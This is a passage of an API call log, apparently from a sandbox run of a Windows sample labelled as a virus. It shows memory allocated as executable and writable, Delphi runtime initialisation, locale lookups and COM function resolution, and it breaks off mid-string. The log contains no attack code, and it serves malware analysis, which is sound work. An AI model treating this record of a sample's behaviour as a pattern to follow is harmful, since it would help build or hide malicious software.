VirtualAlloc (lpAddress=0x3010000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3010000 [0056.621] VirtualAlloc (lpAddress=0x3014000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3014000 [0056.622] VirtualAlloc (lpAddress=0x3018000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3018000 [0056.622] VirtualAlloc (lpAddress=0x301c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x301c000 [0056.623] VirtualAlloc (lpAddress=0x3020000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0056.623] VirtualAlloc (lpAddress=0x3024000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3024000 [0056.623] VirtualAlloc (lpAddress=0x3028000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3028000 [0056.624] VirtualAlloc (lpAddress=0x302c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x302c000 [0056.624] VirtualAlloc (lpAddress=0x3030000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3030000 [0056.625] VirtualAlloc (lpAddress=0x3034000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3034000 [0056.625] VirtualAlloc (lpAddress=0x3038000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3038000 [0056.626] VirtualAlloc (lpAddress=0x303c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x303c000 [0056.626] VirtualAlloc (lpAddress=0x3040000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0056.627] VirtualAlloc (lpAddress=0x3044000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3044000 [0056.627] VirtualAlloc (lpAddress=0x3048000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3048000 [0056.628] VirtualAlloc (lpAddress=0x304c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x304c000 [0056.628] VirtualAlloc (lpAddress=0x3050000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3050000 [0056.629] VirtualAlloc (lpAddress=0x3054000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3054000 [0056.629] VirtualAlloc (lpAddress=0x3058000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3058000 [0056.630] VirtualAlloc (lpAddress=0x305c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x305c000 [0056.630] VirtualAlloc (lpAddress=0x3060000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3060000 [0056.631] VirtualAlloc (lpAddress=0x3064000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3064000 [0056.631] VirtualAlloc (lpAddress=0x3068000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3068000 [0056.632] VirtualAlloc (lpAddress=0x306c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x306c000 [0056.632] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x31e0000 [0056.632] VirtualAlloc (lpAddress=0x31e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31e0000 [0056.633] VirtualAlloc (lpAddress=0x31e4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31e4000 [0056.633] VirtualAlloc (lpAddress=0x31e8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31e8000 [0056.634] VirtualAlloc (lpAddress=0x31ec000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31ec000 [0056.634] VirtualAlloc (lpAddress=0x31f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31f0000 [0056.634] VirtualAlloc (lpAddress=0x31f4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31f4000 [0056.635] VirtualAlloc (lpAddress=0x31f8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31f8000 [0056.635] VirtualAlloc (lpAddress=0x31fc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x31fc000 [0056.636] VirtualAlloc (lpAddress=0x3200000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3200000 [0056.636] VirtualAlloc (lpAddress=0x3204000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3204000 [0056.637] VirtualAlloc (lpAddress=0x3208000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3208000 [0056.637] VirtualAlloc (lpAddress=0x320c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x320c000 [0056.637] VirtualAlloc (lpAddress=0x3210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3210000 [0056.638] VirtualAlloc (lpAddress=0x3214000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3214000 [0056.638] VirtualAlloc (lpAddress=0x3218000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3218000 [0056.639] VirtualAlloc (lpAddress=0x321c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x321c000 [0056.639] VirtualAlloc (lpAddress=0x3220000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3220000 [0056.639] VirtualAlloc (lpAddress=0x3224000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3224000 [0056.640] VirtualAlloc (lpAddress=0x3228000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3228000 [0056.640] VirtualAlloc (lpAddress=0x322c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x322c000 [0056.641] VirtualAlloc (lpAddress=0x3230000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3230000 [0056.642] VirtualAlloc (lpAddress=0x3234000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3234000 [0056.642] VirtualAlloc (lpAddress=0x3238000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3238000 [0056.642] VirtualAlloc (lpAddress=0x323c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x323c000 [0056.643] VirtualAlloc (lpAddress=0x3240000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3240000 [0056.643] VirtualAlloc (lpAddress=0x3244000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3244000 [0056.644] VirtualAlloc (lpAddress=0x3248000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3248000 [0056.644] VirtualAlloc (lpAddress=0x324c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x324c000 [0056.644] VirtualAlloc (lpAddress=0x3250000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3250000 [0056.646] VirtualAlloc (lpAddress=0x3254000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3254000 [0056.646] VirtualAlloc (lpAddress=0x3258000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3258000 [0056.646] VirtualAlloc (lpAddress=0x325c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x325c000 [0056.647] VirtualAlloc (lpAddress=0x0, dwSize=0x3d0900, flAllocationType=0x101000, flProtect=0x40) returned 0x7ebd0000 [0056.985] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0xe35c70 [0056.986] GetKeyboardType (nTypeFlag=0) returned 4 [0057.089] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0057.089] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.089] GetVersion () returned 0x1db10106 [0057.089] GetVersion () returned 0x1db10106 [0057.089] GetCurrentThreadId () returned 0xf38 [0057.263] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0057.906] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0057.906] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0057.906] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0057.906] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0057.906] lstrcpynA (in: lpString1=0x28f863, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=261 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0057.907] GetThreadLocale () returned 0x409 [0057.907] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0057.907] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0057.907] lstrcpynA (in: lpString1=0x28f8a5, lpString2="ENU", iMaxLength=195 | out: lpString1="ENU") returned="ENU" [0057.907] LoadLibraryExA (lpLibFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0057.909] lstrcpynA (in: lpString1=0x28f8a5, lpString2="EN", iMaxLength=195 | out: lpString1="EN") returned="EN" [0057.909] LoadLibraryExA (lpLibFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0057.909] LoadStringA (in: hInstance=0x42d000, uID=0xffc2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0058.081] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xe38dd8 [0058.081] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x32e0000 [0058.737] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xe39dd8 [0058.738] VirtualAlloc (lpAddress=0x32e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0058.739] LoadStringA (in: hInstance=0x42d000, uID=0xffc1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0058.739] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0058.739] LoadStringA (in: hInstance=0x42d000, uID=0xffc0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0058.739] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0058.739] LoadStringA (in: hInstance=0x42d000, uID=0xffdb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0058.740] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0058.741] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0058.741] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0058.741] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0058.841] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0058.841] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0058.841] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fe68, dwMinorVersion=0x656, dwBuildNumber=0x0, dwPlatformId=0x57935a, szCSDVersion="\x8f\x80W") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0058.903] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0058.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0058.903] GetThreadLocale () returned 0x409 [0058.978] GetThreadLocale () returned 0x409 [0058.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0058.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0058.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0058.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0058.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0058.980] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0058.981] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0058.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0058.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0058.985] GetThreadLocale () returned 0x409 [0058.985] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0058.985] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0059.047] GetThreadLocale () returned 0x409 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0059.047] GetThreadLocale () returned 0x409 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0059.047] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0059.047] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0059.047] GetProcAddress (hModule=0x775d0000, lpProcName="VariantChangeTypeEx") returned 0x775d4c28 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0059.048] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarI4FromStr") returned 0x775e6fab [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromStr") returned 0x775f01a0 [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarR8FromStr") returned 0x775e699e [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromStr") returned 0x775f6ba7 [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyFromStr") returned 0x77616c12 [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarBoolFromStr") returned 0x775edbd1 [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromCy") returned 0x775f7fdc [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromDate") returned 0x775e7a2a [0059.049] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromBool") returned 0x775f0355 [0059.194] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0059.194] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0059.194] GetProcAddress (hModule=0x76c60000, lpProcName="CoInitializeEx") returned 0x76ca09ad [0059.194] GetProcAddress (hModule=0x76c60000, lpProcName="CoAddRefServerProcess") returned 0x76cc3cf3 [0059.194] GetProcAddress (hModule=0x76c60000, lpProcName="CoReleaseServerProcess") returned 0x76cc4314 [0059.194] GetProcAddress (hModule=0x76c60000, lpProcName="CoResumeClassObjects") returned 0x76c6ea02 [0059.194] GetProcAddress (hModule=0x76c60000, lpProcName="CoSuspendClassObjects") returned 0x76ccbb02 [0059.427] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xb4 [0059.427] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb8 [0059.427] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbc [0060.405] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3054184756730) returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b634*=0x0, psz="%UserProfile FOLDER%", len=0x14 | out: pbstr=0x54b634*="%UserProfile FOLDER%") returned 1 [0061.110] SysReAllocStringLen (in: pbstr=0x54b630*=0x0, psz="%SYSTEM DRIVE%", len=0xe | out: pbstr=0x54b630*="%SYSTEM 